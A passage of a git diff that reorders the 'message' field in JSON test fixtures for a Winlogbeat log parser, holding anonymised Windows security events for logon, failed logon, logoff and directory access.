Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + } }, "expected": { "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json index ac5882d46..85bda7ac7 100644 --- a/Beats/winlogbeat/tests/security_event_4625.json +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json index ddc69e63b..035469c13 100644 --- a/Beats/winlogbeat/tests/security_event_4634.json +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json index 3d80320f5..3f1de8e53 100644 --- a/Beats/winlogbeat/tests/security_event_4662.json +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 